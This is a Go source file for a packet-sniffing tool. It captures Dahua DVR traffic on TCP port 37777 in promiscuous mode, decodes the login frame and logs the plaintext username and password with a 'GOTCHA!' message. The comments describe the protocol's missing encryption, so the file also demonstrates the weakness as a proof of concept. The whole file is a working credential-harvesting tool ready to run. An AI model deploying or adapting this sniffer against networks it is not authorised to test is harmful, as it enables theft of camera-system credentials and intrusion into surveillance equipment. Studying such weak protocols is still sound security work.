package main | |
import ( | |
"bytes" | |
"encoding/binary" | |
"github.com/google/gopacket" | |
"github.com/google/gopacket/pcap" | |
"github.com/quan-to/slog" | |
) | |
var (
	// log is the scoped logger used for every message this tool prints.
	log = slog.Scope("Dahua")

	// networkInterface names the capture device opened by main; it is
	// hard-coded, so edit it to match the local interface before running.
	networkInterface = "wlp3s0"
)
// LoginPacket mirrors the fixed-size login frame that main decodes from
// the TCP payload with binary.Read in little-endian order. Field order
// and widths define the wire layout (32 bytes in total), so they must not
// be rearranged.
//
// Username and Password are read straight out of the payload with no
// decryption step, which means the frame exposes them to anything that
// can observe the traffic.
type LoginPacket struct {
	// PacketType is 0x00A0, hardcoded on Dahua.
	PacketType uint16
	// Unk0 is 0x6000, hardcoded on Dahua.
	Unk0 uint16
	// Unk1 is 0x00000000.
	Unk1 uint32
	// Username is a fixed 8-byte field; author's note: admin.
	Username [8]byte
	// Password is a fixed 8-byte field; author's note: admin.
	Password [8]byte
	// Unk2 is 0x00030204.
	Unk2 uint32
	// Unk3 is 0xAAA10100.
	Unk3 uint32
}
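// main opens networkInterface in promiscuous mode, restricts the capture
// to TCP port 37777 and inspects each payload's leading little-endian
// uint16. A value of 0xA0 is decoded as a LoginPacket and its credential
// fields are logged; once a login has been seen, the first 0xBC packet
// ends the capture.
//
// The credential fields are logged exactly as they appear in the payload,
// with no decoding step in between, so the login is readable by anyone who
// can observe this port. The log output therefore contains credentials and
// is itself sensitive.
func main() {
	log.Info("Opening %s in promisc mode", networkInterface)
	handle, err := pcap.OpenLive(networkInterface, 1600, true, pcap.BlockForever)
	if err != nil {
		log.Fatal(err)
	}
	// Release the capture handle when the loop ends; the original never
	// closed it.
	defer handle.Close()

	if err = handle.SetBPFFilter("tcp and port 37777"); err != nil {
		log.Fatal("Cannot set filter: %s", err)
	}

	src := gopacket.NewPacketSource(handle, handle.LinkType())
	log.Info("Waiting")

	// gotLogin is a single flag for the whole capture, not per connection:
	// a 0xBC packet from any flow ends the loop once any login was seen.
	gotLogin := false

	for packet := range src.Packets() {
		t := packet.TransportLayer()
		if t == nil {
			continue
		}

		payload := t.LayerPayload()
		// The type field is two bytes wide. Checking only for an empty
		// payload let a one-byte payload reach Uint16, which either
		// panics or reads past the payload's length.
		if len(payload) < 2 {
			continue
		}

		switch ptype := binary.LittleEndian.Uint16(payload[:2]); {
		case ptype == 0xA0: // Login Packet
			l := &LoginPacket{}
			// binary.Read fails with an EOF error when the payload is
			// shorter than the struct, e.g. a frame split across segments.
			err = binary.Read(bytes.NewReader(payload), binary.LittleEndian, l)
			if err != nil {
				log.Error("Error parsing login packet: %s", err)
				continue
			}
			gotLogin = true
			log.Warn("GOTCHA! Username: %s - Password: %s", l.Username, l.Password)
		case ptype == 0xBC && gotLogin:
			log.Warn("Got login, and stream data. Closing it...")
			return
		}
	}
}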